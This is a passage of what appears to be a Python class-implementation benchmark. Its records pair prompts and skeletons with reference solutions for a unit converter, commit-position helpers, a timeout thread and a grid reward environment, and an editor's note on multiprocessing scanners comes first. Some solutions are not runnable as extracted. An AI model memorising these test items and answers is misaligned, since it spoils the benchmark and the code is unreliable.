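Editor's note on the ScannerEngine record above: `start_scanner_engine` fans the three scanners out as OS processes, joins them all, and terminates them on Ctrl-C. A minimal, standalone sketch of that start/join/terminate pattern follows; the worker is a hypothetical stand-in for the scanners' `start_scan`, and the `__main__` guard is required under the `spawn` start method (the Windows and macOS default).

```python
import multiprocessing
import time

def scan(name):
    """Hypothetical stand-in for a scanner engine's start_scan()."""
    time.sleep(0.1)
    print(name, 'scan finished')

if __name__ == '__main__':
    pool = [multiprocessing.Process(target=scan, args=(n,))
            for n in ('hash', 'yara', 'clamav')]
    try:
        for p in pool:
            p.start()
        for p in pool:          # block until every engine is done
            p.join()
    except KeyboardInterrupt:
        for p in pool:          # mirror the record's cleanup path
            p.terminate()
```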
self._bits_to_bytes is None:\n self._bits_to_bytes = self.conversions(conversion_factor=TO_BYTE)\n return self._bits_to_bytes\n<|end_body_2|>\n\n<|body_start_3|>\n if self._bytes_to_bits is None:\n self._bytes_to_bits = self.conversions(conversion_factor=BYTE)\n return self._bytes_to_bits\n<|end_body_3|>\n\n<|body_start_4|>\n if start_list is None:\n start_list = self.prefix_conversions[0]\n converter_list = [[conversion_factor * conversion for conversion in start_list]]\n for previous in range(self.bit_conversions - 1):\n next_conversions = [self.kilo_prefix ** (previous + 1) * conversion_factor] + converter_list[previous][:-1]\n converter_list.append(next_conversions)\n return converter_list\n<|end_body_4|>\n\n<|body_start_5|>\n for index, units in enumerate(self.bit_units):\n self[units] = dict(list(zip(self.to_units, self.prefix_conversions[index] + self.bits_to_bytes[index])))\n for index, units in enumerate(self.byte_units):\n self[units] = dict(list(zip(self.to_units, self.bytes_to_bits[index] + self.prefix_conversions[index])))\n return\n<|end_body_5|>\n", "class_docstring": "A creator of unit-conversion dictionaries", "class_name": "BaseConverter", "detected_licenses": ["LicenseRef-scancode-unknown-license-reference", "Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass BaseConverter:\n \"\"\"A creator of unit-conversion dictionaries\"\"\"\n\n def __init__(self, to_units, kilo_prefix):\n \"\"\"base_converter constructor :param: - `to_units`: a list of the units to convert to (has to be half to-bits, half to-bytes) - `kilo_prefix`: kilo multiplier matching type of units\"\"\"\n <|body_0|>\n\n def prefix_conversions(self):\n \"\"\"List of lists of prefix conversions\"\"\"\n <|body_1|>\n\n def bits_to_bytes(self):\n \"\"\"List of conversions for bits to bytes\"\"\"\n <|body_2|>\n\n def bytes_to_bits(self):\n \"\"\"list of conversions for bytes to bits\"\"\"\n <|body_3|>\n\n def conversions(self, conversion_factor, start_list=None):\n \"\"\"Creates the converter-lists :param: - `conversion_factor`: multiplier for values (8 or 1/8, or 1) - `start_list`: if given, use to start the conversion-list :return: list of conversion_lists\"\"\"\n <|body_4|>\n\n def build_conversions(self):\n \"\"\"builds the dictionary\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.to_units = to_units\n self.kilo_prefix = kilo_prefix\n self._prefix_conversions = None\n self._bits_to_bytes = None\n self._bytes_to_bits = None\n self.bit_conversions = self.byte_conversions = len(to_units) // 2\n self.bit_units = to_units[:self.bit_conversions]\n self.byte_units = to_units[self.byte_conversions:]\n return\n<|end_body_0|>\n\n<|body_start_1|>\n if self._prefix_conversions is None:\n start_list = [self.kilo_prefix ** (-power) for power in range(self.bit_conversions)]\n self._prefix_conversions = self.conversions(conversion_factor=1, start_list=start_list)\n return self._prefix_conversions\n<|end_body_1|>\n\n<|body_start_2|>\n if self._bits_to_bytes is None:\n self._bits_to_bytes = self.conversions(conversion_factor=TO_BYTE)\n return self._bits_to_bytes\n<|end_body_2|>\n\n<|body_start_3|>\n if self._bytes_to_bits is None:\n self._bytes_to_bits = self.conversions(conversion_factor=BYTE)\n return self._bytes_to_bits\n<|end_body_3|>\n\n<|body_start_4|>\n if start_list is None:\n start_list = self.prefix_conversions[0]\n converter_list = [[conversion_factor * conversion for conversion in start_list]]\n for previous in range(self.bit_conversions - 1):\n 
next_conversions = [self.kilo_prefix ** (previous + 1) * conversion_factor] + converter_list[previous][:-1]\n converter_list.append(next_conversions)\n return converter_list\n<|end_body_4|>\n\n<|body_start_5|>\n for index, units in enumerate(self.bit_units):\n self[units] = dict(list(zip(self.to_units, self.prefix_conversions[index] + self.bits_to_bytes[index])))\n for index, units in enumerate(self.byte_units):\n self[units] = dict(list(zip(self.to_units, self.bytes_to_bits[index] + self.prefix_conversions[index])))\n return\n<|end_body_5|>\n", "id": "stack_v2_sparse_classes_10k_test_000298", "length_bytes": 10932, "license_type": "permissive", "methods": [{"docstring": "base_converter constructor :param: - `to_units`: a list of the units to convert to (has to be half to-bits, half to-bytes) - `kilo_prefix`: kilo multiplier matching type of units", "name": "__init__", "signature": "def __init__(self, to_units, kilo_prefix)"}, {"docstring": "List of lists of prefix conversions", "name": "prefix_conversions", "signature": "def prefix_conversions(self)"}, {"docstring": "List of conversions for bits to bytes", "name": "bits_to_bytes", "signature": "def bits_to_bytes(self)"}, {"docstring": "list of conversions for bytes to bits", "name": "bytes_to_bits", "signature": "def bytes_to_bits(self)"}, {"docstring": "Creates the converter-lists :param: - `conversion_factor`: multiplier for values (8 or 1/8, or 1) - `start_list`: if given, use to start the conversion-list :return: list of conversion_lists", "name": "conversions", "signature": "def conversions(self, conversion_factor, start_list=None)"}, {"docstring": "builds the dictionary", "name": "build_conversions", "signature": "def build_conversions(self)"}], "n_methods": 6, "original_id": "stack_v2_sparse_classes_30k_train_000872", "prompt": "Implement the Python class `BaseConverter` described below.\n\nClass description:\nA creator of unit-conversion dictionaries\n\nMethod signatures and docstrings:\n- def __init__(self, to_units, kilo_prefix): base_converter constructor :param: - `to_units`: a list of the units to convert to (has to be half to-bits, half to-bytes) - `kilo_prefix`: kilo multiplier matching type of units\n- def prefix_conversions(self): List of lists of prefix conversions\n- def bits_to_bytes(self): List of conversions for bits to bytes\n- def bytes_to_bits(self): list of conversions for bytes to bits\n- def conversions(self, conversion_factor, start_list=None): Creates the converter-lists :param: - `conversion_factor`: multiplier for values (8 or 1/8, or 1) - `start_list`: if given, use to start the conversion-list :return: list of conversion_lists\n- def build_conversions(self): builds the dictionary", "prompted_full_text": "Implement the Python class `BaseConverter` described below.\n\nClass description:\nA creator of unit-conversion dictionaries\n\nMethod signatures and docstrings:\n- def __init__(self, to_units, kilo_prefix): base_converter constructor :param: - `to_units`: a list of the units to convert to (has to be half to-bits, half to-bytes) - `kilo_prefix`: kilo multiplier matching type of units\n- def prefix_conversions(self): List of lists of prefix conversions\n- def bits_to_bytes(self): List of conversions for bits to bytes\n- def bytes_to_bits(self): list of conversions for bytes to bits\n- def conversions(self, conversion_factor, start_list=None): Creates the converter-lists :param: - `conversion_factor`: multiplier for values (8 or 1/8, or 1) - `start_list`: if given, use to start the conversion-list :return: 
list of conversion_lists\n- def build_conversions(self): builds the dictionary\n\n<|skeleton|>\nclass BaseConverter:\n \"\"\"A creator of unit-conversion dictionaries\"\"\"\n\n def __init__(self, to_units, kilo_prefix):\n \"\"\"base_converter constructor :param: - `to_units`: a list of the units to convert to (has to be half to-bits, half to-bytes) - `kilo_prefix`: kilo multiplier matching type of units\"\"\"\n <|body_0|>\n\n def prefix_conversions(self):\n \"\"\"List of lists of prefix conversions\"\"\"\n <|body_1|>\n\n def bits_to_bytes(self):\n \"\"\"List of conversions for bits to bytes\"\"\"\n <|body_2|>\n\n def bytes_to_bits(self):\n \"\"\"list of conversions for bytes to bits\"\"\"\n <|body_3|>\n\n def conversions(self, conversion_factor, start_list=None):\n \"\"\"Creates the converter-lists :param: - `conversion_factor`: multiplier for values (8 or 1/8, or 1) - `start_list`: if given, use to start the conversion-list :return: list of conversion_lists\"\"\"\n <|body_4|>\n\n def build_conversions(self):\n \"\"\"builds the dictionary\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.to_units = to_units\n self.kilo_prefix = kilo_prefix\n self._prefix_conversions = None\n self._bits_to_bytes = None\n self._bytes_to_bits = None\n self.bit_conversions = self.byte_conversions = len(to_units) // 2\n self.bit_units = to_units[:self.bit_conversions]\n self.byte_units = to_units[self.byte_conversions:]\n return\n<|end_body_0|>\n\n<|body_start_1|>\n if self._prefix_conversions is None:\n start_list = [self.kilo_prefix ** (-power) for power in range(self.bit_conversions)]\n self._prefix_conversions = self.conversions(conversion_factor=1, start_list=start_list)\n return self._prefix_conversions\n<|end_body_1|>\n\n<|body_start_2|>\n if self._bits_to_bytes is None:\n self._bits_to_bytes = self.conversions(conversion_factor=TO_BYTE)\n return self._bits_to_bytes\n<|end_body_2|>\n\n<|body_start_3|>\n if self._bytes_to_bits is None:\n self._bytes_to_bits = self.conversions(conversion_factor=BYTE)\n return self._bytes_to_bits\n<|end_body_3|>\n\n<|body_start_4|>\n if start_list is None:\n start_list = self.prefix_conversions[0]\n converter_list = [[conversion_factor * conversion for conversion in start_list]]\n for previous in range(self.bit_conversions - 1):\n next_conversions = [self.kilo_prefix ** (previous + 1) * conversion_factor] + converter_list[previous][:-1]\n converter_list.append(next_conversions)\n return converter_list\n<|end_body_4|>\n\n<|body_start_5|>\n for index, units in enumerate(self.bit_units):\n self[units] = dict(list(zip(self.to_units, self.prefix_conversions[index] + self.bits_to_bytes[index])))\n for index, units in enumerate(self.byte_units):\n self[units] = dict(list(zip(self.to_units, self.bytes_to_bits[index] + self.prefix_conversions[index])))\n return\n<|end_body_5|>\n", "revision_id": "2007bf3fe66edfe704e485141c55caed54fe13aa", "skeleton": "<|skeleton|>\nclass BaseConverter:\n \"\"\"A creator of unit-conversion dictionaries\"\"\"\n\n def __init__(self, to_units, kilo_prefix):\n \"\"\"base_converter constructor :param: - `to_units`: a list of the units to convert to (has to be half to-bits, half to-bytes) - `kilo_prefix`: kilo multiplier matching type of units\"\"\"\n <|body_0|>\n\n def prefix_conversions(self):\n \"\"\"List of lists of prefix conversions\"\"\"\n <|body_1|>\n\n def bits_to_bytes(self):\n \"\"\"List of conversions for bits to bytes\"\"\"\n <|body_2|>\n\n def bytes_to_bits(self):\n \"\"\"list of conversions for bytes to bits\"\"\"\n 
<|body_3|>\n\n def conversions(self, conversion_factor, start_list=None):\n \"\"\"Creates the converter-lists :param: - `conversion_factor`: multiplier for values (8 or 1/8, or 1) - `start_list`: if given, use to start the conversion-list :return: list of conversion_lists\"\"\"\n <|body_4|>\n\n def build_conversions(self):\n \"\"\"builds the dictionary\"\"\"\n <|body_5|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class BaseConverter:\n \"\"\"A creator of unit-conversion dictionaries\"\"\"\n\n def __init__(self, to_units, kilo_prefix):\n \"\"\"base_converter constructor :param: - `to_units`: a list of the units to convert to (has to be half to-bits, half to-bytes) - `kilo_prefix`: kilo multiplier matching type of units\"\"\"\n self.to_units = to_units\n self.kilo_prefix = kilo_prefix\n self._prefix_conversions = None\n self._bits_to_bytes = None\n self._bytes_to_bits = None\n self.bit_conversions = self.byte_conversions = len(to_units) // 2\n self.bit_units = to_units[:self.bit_conversions]\n self.byte_units = to_units[self.byte_conversions:]\n return\n\n def prefix_conversions(self):\n \"\"\"List of lists of prefix conversions\"\"\"\n if self._prefix_conversions is None:\n start_list = [self.kilo_prefix ** (-power) for power in range(self.bit_conversions)]\n self._prefix_conversions = self.conversions(conversion_factor=1, start_list=start_list)\n return self._prefix_conversions\n\n def bits_to_bytes(self):\n \"\"\"List of conversions for bits to bytes\"\"\"\n if self._bits_to_bytes is None:\n self._bits_to_bytes = self.conversions(conversion_factor=TO_BYTE)\n return self._bits_to_bytes\n\n def bytes_to_bits(self):\n \"\"\"list of conversions for bytes to bits\"\"\"\n if self._bytes_to_bits is None:\n self._bytes_to_bits = self.conversions(conversion_factor=BYTE)\n return self._bytes_to_bits\n\n def conversions(self, conversion_factor, start_list=None):\n \"\"\"Creates the converter-lists :param: - `conversion_factor`: multiplier for values (8 or 1/8, or 1) - `start_list`: if given, use to start the conversion-list :return: list of conversion_lists\"\"\"\n if start_list is None:\n start_list = self.prefix_conversions[0]\n converter_list = [[conversion_factor * conversion for conversion in start_list]]\n for previous in range(self.bit_conversions - 1):\n next_conversions = [self.kilo_prefix ** (previous + 1) * conversion_factor] + converter_list[previous][:-1]\n converter_list.append(next_conversions)\n return converter_list\n\n def build_conversions(self):\n \"\"\"builds the dictionary\"\"\"\n for index, units in enumerate(self.bit_units):\n self[units] = dict(list(zip(self.to_units, self.prefix_conversions[index] + self.bits_to_bytes[index])))\n for index, units in enumerate(self.byte_units):\n self[units] = dict(list(zip(self.to_units, self.bytes_to_bits[index] + self.prefix_conversions[index])))\n return\n", "source": "the_stack_v2_python_sparse", "source_path": "utils/iperflexer/unitconverter.py", "source_repo": "AndriyZabavskyy/taf", "split": "test", "star_events_count": 0} {"blob_id": "cef2b5861fa3e232f5a6574246b28a99cd53136e", "bodies": ["assert revision in self.blame_list\nfor i in range(0, len(self.blame_list)):\n if revision == self.blame_list[i]:\n return i + self.previous_build_commit_position + 1", "length = len(self.blame_list)\nassert commit_position > self.commit_position - length and commit_position <= self.commit_position\nreturn self.blame_list[length - (self.commit_position 
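Editor's note on the BaseConverter record above: `conversions` builds one row per source unit, where each row is the previous row shifted right with a fresh `kilo_prefix ** n` factor prepended. The sketch below re-derives that arithmetic outside the class; `BYTE` and `TO_BYTE` are module constants the record references but does not show, assumed here to be 8 and 1/8.

```python
BYTE = 8          # bits per byte (assumed)
TO_BYTE = 1 / 8   # bytes per bit (assumed)

def conversion_rows(n, kilo_prefix=1000, factor=1):
    """Rebuild the shifted geometric rows produced by conversions()."""
    start = [kilo_prefix ** -p for p in range(n)]
    rows = [[factor * c for c in start]]
    for prev in range(n - 1):
        rows.append([kilo_prefix ** (prev + 1) * factor] + rows[prev][:-1])
    return rows

rows = conversion_rows(3)                        # units: bits, kilobits, megabits
print(rows[2][1])                                # 1000: megabits -> kilobits
print(conversion_rows(3, factor=TO_BYTE)[0][0])  # 0.125: bits -> bytes
```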
- commit_position) - 1]", "blamed_cls = {}\ncommit_position = self.commit_position\nfor i in xrange(len(self.blame_list) - 1, -1, -1):\n blamed_cls[commit_position] = self.blame_list[i]\n commit_position -= 1\nreturn blamed_cls"], "bodies_text": "<|body_start_0|>\n assert revision in self.blame_list\n for i in range(0, len(self.blame_list)):\n if revision == self.blame_list[i]:\n return i + self.previous_build_commit_position + 1\n<|end_body_0|>\n\n<|body_start_1|>\n length = len(self.blame_list)\n assert commit_position > self.commit_position - length and commit_position <= self.commit_position\n return self.blame_list[length - (self.commit_position - commit_position) - 1]\n<|end_body_1|>\n\n<|body_start_2|>\n blamed_cls = {}\n commit_position = self.commit_position\n for i in xrange(len(self.blame_list) - 1, -1, -1):\n blamed_cls[commit_position] = self.blame_list[i]\n commit_position -= 1\n return blamed_cls\n<|end_body_2|>\n", "class_docstring": "", "class_name": "DataPoint", "detected_licenses": ["BSD-3-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass DataPoint:\n\n def GetCommitPosition(self, revision):\n \"\"\"Gets the commit position of a revision within blame_list. Args: revision (str): The revision to search for. Returns: commit_position (int): The calculated commit position of revision.\"\"\"\n <|body_0|>\n\n def GetRevisionAtCommitPosition(self, commit_position):\n \"\"\"Gets the corresponding revision to commit_position. Args: commit_position (int): The commit position for which to find the corresponding revision within self.blame_list. Returns: revision (str): The git revision corresponding to commit_position.\"\"\"\n <|body_1|>\n\n def GetDictOfCommitPositionAndRevision(self):\n \"\"\"Gets a dict of commit_position:revision items for this data_point.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n assert revision in self.blame_list\n for i in range(0, len(self.blame_list)):\n if revision == self.blame_list[i]:\n return i + self.previous_build_commit_position + 1\n<|end_body_0|>\n\n<|body_start_1|>\n length = len(self.blame_list)\n assert commit_position > self.commit_position - length and commit_position <= self.commit_position\n return self.blame_list[length - (self.commit_position - commit_position) - 1]\n<|end_body_1|>\n\n<|body_start_2|>\n blamed_cls = {}\n commit_position = self.commit_position\n for i in xrange(len(self.blame_list) - 1, -1, -1):\n blamed_cls[commit_position] = self.blame_list[i]\n commit_position -= 1\n return blamed_cls\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000299", "length_bytes": 11733, "license_type": "permissive", "methods": [{"docstring": "Gets the commit position of a revision within blame_list. Args: revision (str): The revision to search for. Returns: commit_position (int): The calculated commit position of revision.", "name": "GetCommitPosition", "signature": "def GetCommitPosition(self, revision)"}, {"docstring": "Gets the corresponding revision to commit_position. Args: commit_position (int): The commit position for which to find the corresponding revision within self.blame_list. 
Returns: revision (str): The git revision corresponding to commit_position.", "name": "GetRevisionAtCommitPosition", "signature": "def GetRevisionAtCommitPosition(self, commit_position)"}, {"docstring": "Gets a dict of commit_position:revision items for this data_point.", "name": "GetDictOfCommitPositionAndRevision", "signature": "def GetDictOfCommitPositionAndRevision(self)"}], "n_methods": 3, "prompt": "Implement the Python class `DataPoint` described below.\n\nClass description:\nImplement the DataPoint class.\n\nMethod signatures and docstrings:\n- def GetCommitPosition(self, revision): Gets the commit position of a revision within blame_list. Args: revision (str): The revision to search for. Returns: commit_position (int): The calculated commit position of revision.\n- def GetRevisionAtCommitPosition(self, commit_position): Gets the corresponding revision to commit_position. Args: commit_position (int): The commit position for which to find the corresponding revision within self.blame_list. Returns: revision (str): The git revision corresponding to commit_position.\n- def GetDictOfCommitPositionAndRevision(self): Gets a dict of commit_position:revision items for this data_point.", "prompted_full_text": "Implement the Python class `DataPoint` described below.\n\nClass description:\nImplement the DataPoint class.\n\nMethod signatures and docstrings:\n- def GetCommitPosition(self, revision): Gets the commit position of a revision within blame_list. Args: revision (str): The revision to search for. Returns: commit_position (int): The calculated commit position of revision.\n- def GetRevisionAtCommitPosition(self, commit_position): Gets the corresponding revision to commit_position. Args: commit_position (int): The commit position for which to find the corresponding revision within self.blame_list. Returns: revision (str): The git revision corresponding to commit_position.\n- def GetDictOfCommitPositionAndRevision(self): Gets a dict of commit_position:revision items for this data_point.\n\n<|skeleton|>\nclass DataPoint:\n\n def GetCommitPosition(self, revision):\n \"\"\"Gets the commit position of a revision within blame_list. Args: revision (str): The revision to search for. Returns: commit_position (int): The calculated commit position of revision.\"\"\"\n <|body_0|>\n\n def GetRevisionAtCommitPosition(self, commit_position):\n \"\"\"Gets the corresponding revision to commit_position. Args: commit_position (int): The commit position for which to find the corresponding revision within self.blame_list. 
Returns: revision (str): The git revision corresponding to commit_position.\"\"\"\n <|body_1|>\n\n def GetDictOfCommitPositionAndRevision(self):\n \"\"\"Gets a dict of commit_position:revision items for this data_point.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n assert revision in self.blame_list\n for i in range(0, len(self.blame_list)):\n if revision == self.blame_list[i]:\n return i + self.previous_build_commit_position + 1\n<|end_body_0|>\n\n<|body_start_1|>\n length = len(self.blame_list)\n assert commit_position > self.commit_position - length and commit_position <= self.commit_position\n return self.blame_list[length - (self.commit_position - commit_position) - 1]\n<|end_body_1|>\n\n<|body_start_2|>\n blamed_cls = {}\n commit_position = self.commit_position\n for i in xrange(len(self.blame_list) - 1, -1, -1):\n blamed_cls[commit_position] = self.blame_list[i]\n commit_position -= 1\n return blamed_cls\n<|end_body_2|>\n", "revision_id": "09064105713603f7bf75c772e8354800a1bfa256", "skeleton": "<|skeleton|>\nclass DataPoint:\n\n def GetCommitPosition(self, revision):\n \"\"\"Gets the commit position of a revision within blame_list. Args: revision (str): The revision to search for. Returns: commit_position (int): The calculated commit position of revision.\"\"\"\n <|body_0|>\n\n def GetRevisionAtCommitPosition(self, commit_position):\n \"\"\"Gets the corresponding revision to commit_position. Args: commit_position (int): The commit position for which to find the corresponding revision within self.blame_list. Returns: revision (str): The git revision corresponding to commit_position.\"\"\"\n <|body_1|>\n\n def GetDictOfCommitPositionAndRevision(self):\n \"\"\"Gets a dict of commit_position:revision items for this data_point.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class DataPoint:\n def GetCommitPosition(self, revision):\n \"\"\"Gets the commit position of a revision within blame_list. Args: revision (str): The revision to search for. Returns: commit_position (int): The calculated commit position of revision.\"\"\"\n assert revision in self.blame_list\n for i in range(0, len(self.blame_list)):\n if revision == self.blame_list[i]:\n return i + self.previous_build_commit_position + 1\n\n def GetRevisionAtCommitPosition(self, commit_position):\n \"\"\"Gets the corresponding revision to commit_position. Args: commit_position (int): The commit position for which to find the corresponding revision within self.blame_list. 
Returns: revision (str): The git revision corresponding to commit_position.\"\"\"\n length = len(self.blame_list)\n assert commit_position > self.commit_position - length and commit_position <= self.commit_position\n return self.blame_list[length - (self.commit_position - commit_position) - 1]\n\n def GetDictOfCommitPositionAndRevision(self):\n \"\"\"Gets a dict of commit_position:revision items for this data_point.\"\"\"\n blamed_cls = {}\n commit_position = self.commit_position\n for i in xrange(len(self.blame_list) - 1, -1, -1):\n blamed_cls[commit_position] = self.blame_list[i]\n commit_position -= 1\n return blamed_cls\n", "source": "the_stack_v2_python_sparse", "source_path": "appengine/findit/model/flake/master_flake_analysis.py", "source_repo": "mcgreevy/chromium-infra", "split": "test", "star_events_count": 1} {"blob_id": "459ef204d1c0f363be5dcfe3248056ac298a29ef", "bodies": ["threading.Thread.__init__(self)\nself.func = func\nself.args = args\nself.kwargs = kwargs\nself.result = NoResult", "try:\n self.result = self.func(*self.args, **self.kwargs)\nexcept Exception as e:\n self.result = NoResult"], "bodies_text": "<|body_start_0|>\n threading.Thread.__init__(self)\n self.func = func\n self.args = args\n self.kwargs = kwargs\n self.result = NoResult\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n self.result = self.func(*self.args, **self.kwargs)\n except Exception as e:\n self.result = NoResult\n<|end_body_1|>\n", "class_docstring": "A Thread which can be used to timeout", "class_name": "TimeoutThread", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass TimeoutThread:\n \"\"\"A Thread which can be used to timeout\"\"\"\n\n def __init__(self, func, *args, **kwargs) -> None:\n \"\"\"Construct a Timeout Thread :param func: The function being called :param args: The arguments :param kwargs: The key word arguments\"\"\"\n <|body_0|>\n\n def run(self) -> None:\n \"\"\"Call the function with the arguments to get the result Effect: Modifies the result of the function call\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n threading.Thread.__init__(self)\n self.func = func\n self.args = args\n self.kwargs = kwargs\n self.result = NoResult\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n self.result = self.func(*self.args, **self.kwargs)\n except Exception as e:\n self.result = NoResult\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000300", "length_bytes": 2229, "license_type": "no_license", "methods": [{"docstring": "Construct a Timeout Thread :param func: The function being called :param args: The arguments :param kwargs: The key word arguments", "name": "__init__", "signature": "def __init__(self, func, *args, **kwargs) -> None"}, {"docstring": "Call the function with the arguments to get the result Effect: Modifies the result of the function call", "name": "run", "signature": "def run(self) -> None"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_000436", "prompt": "Implement the Python class `TimeoutThread` described below.\n\nClass description:\nA Thread which can be used to timeout\n\nMethod signatures and docstrings:\n- def __init__(self, func, *args, **kwargs) -> None: Construct a Timeout Thread :param func: The function being called :param args: The arguments :param kwargs: The key word arguments\n- def run(self) -> None: Call the function with the arguments to get the result Effect: Modifies the result of the function call", "prompted_full_text": "Implement the Python class 
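Editor's note on the DataPoint record above: the helpers assume `blame_list` is ordered oldest to newest and ends at `commit_position`; note also that the record's bodies use Python 2's `xrange`. The sketch below re-derives the same index arithmetic in Python 3 with hypothetical revision names and positions.

```python
blame_list = ['rev_a', 'rev_b', 'rev_c']   # oldest -> newest (hypothetical)
commit_position = 102                       # position of 'rev_c'
previous_build_commit_position = commit_position - len(blame_list)  # 99

def position_of(revision):
    # index 0 maps to previous_build_commit_position + 1
    return blame_list.index(revision) + previous_build_commit_position + 1

def revision_at(position):
    return blame_list[len(blame_list) - (commit_position - position) - 1]

assert position_of('rev_b') == 101
assert revision_at(101) == 'rev_b'
print({commit_position - i: r for i, r in enumerate(reversed(blame_list))})
# {102: 'rev_c', 101: 'rev_b', 100: 'rev_a'}
```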
`TimeoutThread` described below.\n\nClass description:\nA Thread which can be used to timeout\n\nMethod signatures and docstrings:\n- def __init__(self, func, *args, **kwargs) -> None: Construct a Timeout Thread :param func: The function being called :param args: The arguments :param kwargs: The key word arguments\n- def run(self) -> None: Call the function with the arguments to get the result Effect: Modifies the result of the function call\n\n<|skeleton|>\nclass TimeoutThread:\n \"\"\"A Thread which can be used to timeout\"\"\"\n\n def __init__(self, func, *args, **kwargs) -> None:\n \"\"\"Construct a Timeout Thread :param func: The function being called :param args: The arguments :param kwargs: The key word arguments\"\"\"\n <|body_0|>\n\n def run(self) -> None:\n \"\"\"Call the function with the arguments to get the result Effect: Modifies the result of the function call\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n threading.Thread.__init__(self)\n self.func = func\n self.args = args\n self.kwargs = kwargs\n self.result = NoResult\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n self.result = self.func(*self.args, **self.kwargs)\n except Exception as e:\n self.result = NoResult\n<|end_body_1|>\n", "revision_id": "a59252a7d55a474bcb2b469414902c585bc89641", "skeleton": "<|skeleton|>\nclass TimeoutThread:\n \"\"\"A Thread which can be used to timeout\"\"\"\n\n def __init__(self, func, *args, **kwargs) -> None:\n \"\"\"Construct a Timeout Thread :param func: The function being called :param args: The arguments :param kwargs: The key word arguments\"\"\"\n <|body_0|>\n\n def run(self) -> None:\n \"\"\"Call the function with the arguments to get the result Effect: Modifies the result of the function call\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class TimeoutThread:\n \"\"\"A Thread which can be used to timeout\"\"\"\n\n def __init__(self, func, *args, **kwargs) -> None:\n \"\"\"Construct a Timeout Thread :param func: The function being called :param args: The arguments :param kwargs: The key word arguments\"\"\"\n threading.Thread.__init__(self)\n self.func = func\n self.args = args\n self.kwargs = kwargs\n self.result = NoResult\n\n def run(self) -> None:\n \"\"\"Call the function with the arguments to get the result Effect: Modifies the result of the function call\"\"\"\n try:\n self.result = self.func(*self.args, **self.kwargs)\n except Exception as e:\n self.result = NoResult\n", "source": "the_stack_v2_python_sparse", "source_path": "evolution/root_evo/data_defs/timeout.py", "source_repo": "escowart/SoftwareDev", "split": "test", "star_events_count": 0} {"blob_id": "05ffbeee2eb933b53053c2f2a11218a3725a61d4", "bodies": ["original_mesh_shape = (10, 11)\nif columns < 1 or columns > original_mesh_shape[0]:\n columns = original_mesh_shape[0]\nfinals = {(0, 1): 5, (1, 2): 80, (2, 3): 120, (3, 4): 140, (4, 4): 145, (5, 4): 150, (6, 7): 163, (7, 7): 166, (8, 9): 173, (9, 10): 175}\nfinals = dict(filter(lambda x: x[0][0] < columns, finals.items()))\nobstacles = frozenset()\nobstacles = obstacles.union([(0, y) for y in range(2, 11)])\nobstacles = obstacles.union([(1, y) for y in range(3, 11)])\nobstacles = obstacles.union([(2, y) for y in range(4, 11)])\nobstacles = obstacles.union([(3, y) for y in range(5, 11)])\nobstacles = obstacles.union([(4, y) for y in range(5, 11)])\nobstacles = obstacles.union([(5, y) for y in range(5, 11)])\nobstacles = obstacles.union([(6, 
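Editor's note on the TimeoutThread record above: the thread stores its function's return value (or a `NoResult` sentinel) so a caller can enforce a deadline with `join(timeout)` and then inspect `result`. The record's skeleton omits the `threading.Thread` base class that its `threading.Thread.__init__` call implies, and never defines `NoResult`; the usage sketch below restores both.

```python
import threading
import time

NoResult = object()   # sentinel assumed to be defined elsewhere in the source

class TimeoutThread(threading.Thread):
    def __init__(self, func, *args, **kwargs):
        threading.Thread.__init__(self)
        self.func, self.args, self.kwargs = func, args, kwargs
        self.result = NoResult

    def run(self):
        try:
            self.result = self.func(*self.args, **self.kwargs)
        except Exception:
            self.result = NoResult

def slow_add(a, b):
    time.sleep(2)
    return a + b

t = TimeoutThread(slow_add, 1, 2)
t.daemon = True        # don't keep the interpreter alive past the deadline
t.start()
t.join(timeout=0.5)    # give up after half a second
print('timed out' if t.result is NoResult else t.result)  # 'timed out'
```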
y) for y in range(8, 11)])\nobstacles = obstacles.union([(7, y) for y in range(8, 11)])\nobstacles = obstacles.union([(8, y) for y in range(10, 11)])\nobstacles = frozenset(filter(lambda x: x[0] < columns, obstacles))\nmesh_shape = (columns, 11)\ndefault_reward = (-1,) + default_reward + (0,)\ndefault_reward = Vector(default_reward)\nsuper().__init__(mesh_shape=mesh_shape, seed=seed, default_reward=default_reward, initial_state=initial_state, finals=finals, obstacles=obstacles, action_space=action_space)", "reward = self.default_reward.copy()\nself.current_state = self.next_state(action=action)\nreward[1] = self.finals.get(self.current_state, self.default_reward[1])\nreward[2] = -(self.current_state[1] + 1)\ninfo = {}\nfinal = self.is_final(self.current_state)\nreturn (self.current_state, reward, final, info)", "reward = self.default_reward.copy()\nreward[1] = self.finals.get(next_state, self.default_reward[1])\nreward[2] = -(next_state[1] + 1)\nreturn reward"], "bodies_text": "<|body_start_0|>\n original_mesh_shape = (10, 11)\n if columns < 1 or columns > original_mesh_shape[0]:\n columns = original_mesh_shape[0]\n finals = {(0, 1): 5, (1, 2): 80, (2, 3): 120, (3, 4): 140, (4, 4): 145, (5, 4): 150, (6, 7): 163, (7, 7): 166, (8, 9): 173, (9, 10): 175}\n finals = dict(filter(lambda x: 